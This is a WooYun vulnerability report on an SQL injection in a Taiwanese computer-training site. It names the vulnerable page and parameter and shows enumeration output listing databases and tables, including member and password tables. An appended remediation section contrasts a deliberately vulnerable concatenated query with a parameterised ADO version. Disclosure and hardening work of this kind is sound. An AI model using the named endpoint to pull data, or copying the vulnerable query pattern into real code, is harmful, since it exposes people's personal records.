
Vulnerability summary

Defect ID: wooyun-2015-0126993

Vulnerability title: SQL injection at Taiwan's 巨匠電腦

Vendor: 巨匠電腦

Author: 骸骸

Submitted: 2015-07-15 18:43

Fix time: 2015-08-31 12:40

Published: 2015-08-31 12:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (HITCON Taiwan Internet Vulnerability Report Platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-15: details sent to the vendor, awaiting vendor handling
2015-07-17: vendor has confirmed; details visible to the vendor only
2015-07-27: details disclosed to core white hats and experts in the relevant field
2015-08-06: details disclosed to regular white hats
2015-08-16: details disclosed to intern white hats
2015-08-31: details disclosed to the public

Brief description:

Was idly scanning directories and found an SQL injection; it should be possible to dump tens of thousands of member records.

Details:

http://www.pcschool.com.tw/activity/phone/Yahoo_Tcode.asp?pno=


MSSQL 2008 on a Windows Server 2003 system.
available databases [13]:
[*] gjunappdb
[*] Hits
[*] lumigent
[*] master
[*] medialand
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WebAnalytics
[*] webdb
[*] wwwdb // current database
Database: wwwdb
[271 tables]
+------------------------------------------------+
| dbo.104_depno |
| dbo.104_group |
| dbo.104_item |
| dbo.104mapping |
| dbo.104mapping2 |
| dbo.Act_info |
| dbo.Act_namelist |
| dbo.Banners_content |
| dbo.Blacklist |
| dbo.Blacklist_log |
| dbo.ContactLog |
| dbo.ContactTime |
| dbo.ContactTime_WX |
| dbo.DataImport_D |
| dbo.DataImport_M |
| dbo.DeptInCity |
| dbo.DeptInCity_Group |
| dbo.EBook_Info |
| dbo.ERROR_LOG |
| dbo.Edm_Class |
| dbo.Edm_Signup |
| dbo.FunV2 |
| dbo.GjWebService_Log |
| dbo.Group_relation |
| dbo.Last_Contact_User |
| dbo.Login_log |
| dbo.Mail_Report_01 |
| dbo.Mail_Report_02 |
| dbo.Manage |
| dbo.Member_Purchase_D |
| dbo.NameList_Data |
| dbo.NameList_Rpt_B |
| dbo.Namelist_104_log |
| dbo.Namelist_CID_REC |
| dbo.Namelist_Dept_Cnt |
| dbo.Namelist_Holiday |
| dbo.Namelist_Purchase |
| dbo.Namelist_Purchase_Back |
| dbo.Namelist_ReAssign |
| dbo.Namelist_Sch |
| dbo.Namelist_Sch_Log |
| dbo.Namelist_TICKET |
| dbo.Namelist_shift |
| dbo.Namelist_shift_log |
| dbo.PcSchool |
| dbo.Personally_Goal |
| dbo.Recommend |
| dbo.Reservation |
| dbo.Reservation_log |
| dbo.TData |
| dbo.TVote |
| dbo.Telsales_Reward |
| dbo.Ter_Info |
| dbo.Ter_Info_D |
| dbo.V_CLASS_LVL |
| dbo.V_Class_Dept |
| dbo.V_DeptgGroup |
| dbo.V_EXAM |
| dbo.V_Purchase |
| dbo.V_Sys_Org |
| dbo.View_Bas_Areas |
| dbo.View_Bas_City |
| dbo.View_Board_List |
| dbo.View_Board_Reply_List |
| dbo.View_Board_Subject_List |
| dbo.View_Counsel_Subject_Question_List |
| dbo.View_Cousel_Subject_QuestReply_List |
| dbo.View_Lv1_Mapping |
| dbo.View_Lv2_Mapping |
| dbo.View_MEDIA_Info |
| dbo.View_PnoType |
| dbo.View_Pno_Info |
| dbo.View_WebFromtoGp |
| dbo.View_WebPnoGp |
| dbo.View_employee |
| dbo.View_media_cost |
| dbo.View_pcs_ter01 |
| dbo.View_seminar_01 |
| dbo.View_seminar_14 |
| dbo.View_wo_Counsel_Subject_List |
| dbo.View_wo_Counsel_Subject_List_Elite |
| dbo.View_wo_Counsel_Subject_Personal_List |
| dbo.View_wo_Counsel_Subject_Question_Elite_qty |
| dbo.View_wo_Department_List |
| dbo.View_wo_Teacher_List |
| dbo.WEBVIEW |
| dbo.WEB_BOOKING_MASTER |
| dbo.WEB_BOOKING_MASTER1 |
| dbo.WEB_CAMPUS |
| dbo.WEB_CAMPUS_SOB02 |
| dbo.WEB_CERT_CLASS_SOB2 |
| dbo.WEB_CLASS_DETAIL |
| dbo.WEB_CLASS_DETAIL1 |
| dbo.WEB_CLASS_MASTER |
| dbo.WEB_CLASS_PERIOD |
| dbo.WEB_COMPO_CALSS_SOB2 |
| dbo.WEB_COURSE_MASTER |
| dbo.WEB_COURSE_TEXTBOOK |
| dbo.WEB_DEPT |
| dbo.WEB_GUEST_YM |
| dbo.WEB_ITEM_HEADER |
| dbo.WEB_LICENSE_CLASS |
| dbo.WEB_MATERIAL |
| dbo.WEB_MIX_UNIT |
| dbo.WEB_ROLL_CALL |
| dbo.WEB_ROLL_CALL1 |
| dbo.WEB_SEMINAR |
| dbo.WEB_SEMINAR_CLASS |
| dbo.WEB_SOB1 |
| dbo.WEB_SOB2 |
| dbo.WEB_SOB3 |
| dbo.WEB_SOFTWARE |
| dbo.WEB_SOFTWARE_FACID |
| dbo.WEB_TER_EXPER |
| dbo.WEB_TER_INFO |
| dbo.WEB_TER_LEVEL |
| dbo.WEB_TER_LICENSE |
| dbo.WEB_TER_PROFILE |
| dbo.WEB_TER_SKILL |
| dbo.WEB_TER_TAG |
| dbo.WEB_TER_WRITING |
| dbo.W_CLASS |
| dbo.W_CLASS_APPLY |
| dbo.W_CLASS_DEPT |
| dbo.W_CLASS_DETAIL |
| dbo.W_CLASS_GEXAM |
| dbo.W_CLASS_INTRO |
| dbo.W_CLASS_LEVEL1 |
| dbo.W_CLASS_LEVEL2 |
| dbo.W_CLASS_LEVEL3 |
| dbo.W_CLASS_LV1 |
| dbo.W_CLASS_LV2 |
| dbo.W_CLASS_LV3 |
| dbo.W_CLASS_MATERIAL |
| dbo.W_CLASS_PERIOD |
| dbo.W_CLASS_PEXAM |
| dbo.W_CLASS_SERIES |
| dbo.W_CLASS_TEST |
| dbo.W_CLASS_TICKET |
| dbo.W_CLASS_TYPE |
| dbo.W_Class_Cert |
| dbo.W_Code_D |
| dbo.W_Code_M |
| dbo.W_DEPT |
| dbo.W_DESIGNAWARD_GUEST |
| dbo.W_DESIGNAWARD_WORK |
| dbo.W_DownLoadEbookLog |
| dbo.W_DownLoadEbookStr |
| dbo.W_FIRST_MEMBER |
| dbo.W_GJUN_EVENT |
| dbo.W_GJUN_HOPE |
| dbo.W_GJUN_HOT |
| dbo.W_GJUN_STORY |
| dbo.W_ITonline |
| dbo.W_MATERIAL |
| dbo.W_MEDIABANNER_ACTIVITY |
| dbo.W_MEDIABANNER_COST |
| dbo.W_MEDIABANNER_INFO |
| dbo.W_MEDIAKEYWORD_INFO |
| dbo.W_MEDIA_ABINFO |
| dbo.W_MEDIA_INFO |
| dbo.W_MEMBER |
| dbo.W_MEMBERCARD_DETAIL |
| dbo.W_MEMBERCARD_MASTER |
| dbo.W_MEMBERCLASS_TICKET |
| dbo.W_MEMBER_EDUCATION |
| dbo.W_MEMBER_GIFT |
| dbo.W_MEMBER_IDENTITY |
| dbo.W_MEMBER_IDENTITYRESERVE |
| dbo.W_MEMBER_LOG |
| dbo.W_MEMBER_PRESENT |
| dbo.W_MEMBER_PWD |
| dbo.W_MEMBER_TICKET |
| dbo.W_MEMBER_VIEW |
| dbo.W_MIX_CLASS_DETAIL |
| dbo.W_PERSON_TARGET |
| dbo.W_PROD |
| dbo.W_PURCHASE_DETAIL |
| dbo.W_PURCHASE_MASTER |
| dbo.W_SEMINAR |
| dbo.W_SEMINAR_CLASS |
| dbo.W_SEMINAR_PLAN |
| dbo.W_SEMINAR_PLAN_CLASS |
| dbo.W_SEMINAR_PLAN_DEPT |
| dbo.W_SEMINAR_REG |
| dbo.W_SOFTWARE |
| dbo.W_SOFTWARE_CMP |
| dbo.W_TER_INFO |
| dbo.W_Tcode_Log |
| dbo.W_WEBORDER |
| dbo.W_WEB_GUEST |
| dbo.W_WEB_GUEST_DATA |
| dbo.W_WEB_GUEST_Temp |
| dbo.W_WIS_APPLY |
| dbo.Wx_Area_Cnt |
| dbo.Wx_Assign_Log |
| dbo.Wx_User_Info |
| dbo.Wx_User_Info_Log |
| dbo.Wx_city_Area |
| dbo.act_singup_type |
| dbo.app_random_code |
| dbo.course_LvMap |
| dbo.crstbcom |
| dbo.crstbitem |
| dbo.crstbitemdetail |
| dbo.crstbpsn |
| dbo.crstbsdl |
| dbo.crstbstd |
| dbo.dtproperties |
| dbo.e104_jobitem |
| dbo.e104classjob_mapping |
| dbo.epaper01 |
| dbo.epaper02 |
| dbo.epaper03 |
| dbo.epaper04 |
| dbo.epaper05 |
| dbo.epaper06 |
| dbo.epaper07 |
| dbo.exam_count |
| dbo.faq01 |
| dbo.faq02 |
| dbo.faq03 |
| dbo.faq04 |
| dbo.mem_ctrl |
| dbo.member_Belong |
| dbo.memberlog |
| dbo.message03 |
| dbo.message04 |
| dbo.message05 |
| dbo.message06 |
| dbo.namelist_Personally |
| dbo.namelist_TypeChg |
| dbo.namelist_dept_User |
| dbo.namelist_dept_User_log |
| dbo.namelist_rpt |
| dbo.online_black |
| dbo.online_talk |
| dbo.pcs_mem01 |
| dbo.poll_std_01 |
| dbo.poll_std_02 |
| dbo.poll_std_05 |
| dbo.poll_std_ter |
| dbo.rec_namelist |
| dbo.sys_org |
| dbo.teacher_blacklist |
| dbo.teacher_login |
| dbo.users_tel |
| dbo.w_data_EpaperClicks |
| dbo.w_data_InviteMembers |
| dbo.w_data_Members |
| dbo.w_data_Staffs |
| dbo.w_dept_imgs |
| dbo.web_commend |
| dbo.wo_Board |
| dbo.wo_Board_Reply |
| dbo.wo_Board_Subject |
| dbo.wo_Board_Subject_Log |
| dbo.wo_Counsel_Subject |
| dbo.wo_Counsel_Subject_Join |
| dbo.wo_Counsel_Subject_QuestReply |
| dbo.wo_Counsel_Subject_Question |
| dbo.wo_Counsel_Subject_Question_Log |
| dbo.wo_Counsel_Subject_Question_R |
| dbo.wo_Counsel_Subject_Vote |
| dbo.wo_Course |
| dbo.wo_Department |
| dbo.wo_Marquee |
| dbo.wo_ReplyCane |
| dbo.wo_Report |
| dbo.wo_Teacher |
| dbo.wo_subject_mapping |
+------------------------------------------------+
I just picked a sensitive-looking table to dump, such as member.
One of the record counts alone is 1/8821050.
Too much data, so I didn't keep running it.

Proof of vulnerability:

See the details!

Fix recommendation:

Filtering.
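The fix recommendation is a single word, "filtering". For a classic ASP page like the one reported, the durable form of that fix is to stop splicing the pno query-string value into the SQL text and bind it as an ADO parameter instead, with input validation as a second layer. The following is an added example written for this page; it is not code from the original report or from the 巨匠電腦 site. It assumes a connection string in CONN_STR pointing at the wwwdb database, reads the View_Pno_Info view that appears in the table dump (its columns are not shown, so pno and pname are assumed), and assumes a product number is at most 20 letters or digits.

```vbscript
<%
Option Explicit
' Added example for this page, not the site's own Yahoo_Tcode.asp.
' Assumed: CONN_STR reaches the wwwdb database; View_Pno_Info has columns pno and pname.
Const CONN_STR = "Provider=SQLOLEDB;Data Source=(local);Initial Catalog=wwwdb;Integrated Security=SSPI"

' ADO constants normally pulled in from adovbs.inc; defined here so the page is self-contained.
Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

' Vulnerable pattern (the shape of the reported flaw): the raw query-string value is
' spliced into the SQL text, so whatever the client sends in ?pno= becomes part of the statement.
Function FindByPnoUnsafe(conn, pno)
    Set FindByPnoUnsafe = conn.Execute( _
        "SELECT pno, pname FROM View_Pno_Info WHERE pno = '" & pno & "'")
End Function

' Hardened pattern: the value travels as a bound parameter. SQL Server receives the statement
' text and the value separately, so the value cannot change the structure of the query.
Function FindByPnoSafe(conn, pno)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT pno, pname FROM View_Pno_Info WHERE pno = ?"
    cmd.Parameters.Append cmd.CreateParameter("@pno", adVarChar, adParamInput, 20, pno)
    Set FindByPnoSafe = cmd.Execute
End Function

' Defence in depth: reject anything that does not look like a product number before it
' reaches the database at all. The allowed shape (1 to 20 letters/digits) is an assumption.
Function IsValidPno(value)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9]{1,20}$"
    IsValidPno = re.Test(value)
End Function

Dim conn, rs, pno
pno = Request.QueryString("pno")

If Not IsValidPno(pno) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid pno"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open CONN_STR

Set rs = FindByPnoSafe(conn, pno)
Do Until rs.EOF
    ' Encode on output so a stored value cannot turn the listing into an XSS either.
    Response.Write Server.HTMLEncode(rs("pno")) & " - " & Server.HTMLEncode(rs("pname")) & "<br>"
    rs.MoveNext
Loop

rs.Close
conn.Close
%>
```

With the parameter bound, a value containing a quote or a comment sequence is compared literally against the pno column and simply matches nothing; the OLE DB provider hands the statement to SQL Server through sp_executesql with the value as a separate argument, which is also how a defender can tell parameterised from concatenated statements in a SQL Server trace. The regular-expression check is not the fix on its own (character filtering is what the original recommendation amounts to, and it is easy to get wrong); it only narrows what reaches the database.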

Copyright notice: when reposting, please credit the source 骸骸@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-07-17 12:38

Vendor reply:

Thanks for the report!!

Latest status:

None yet

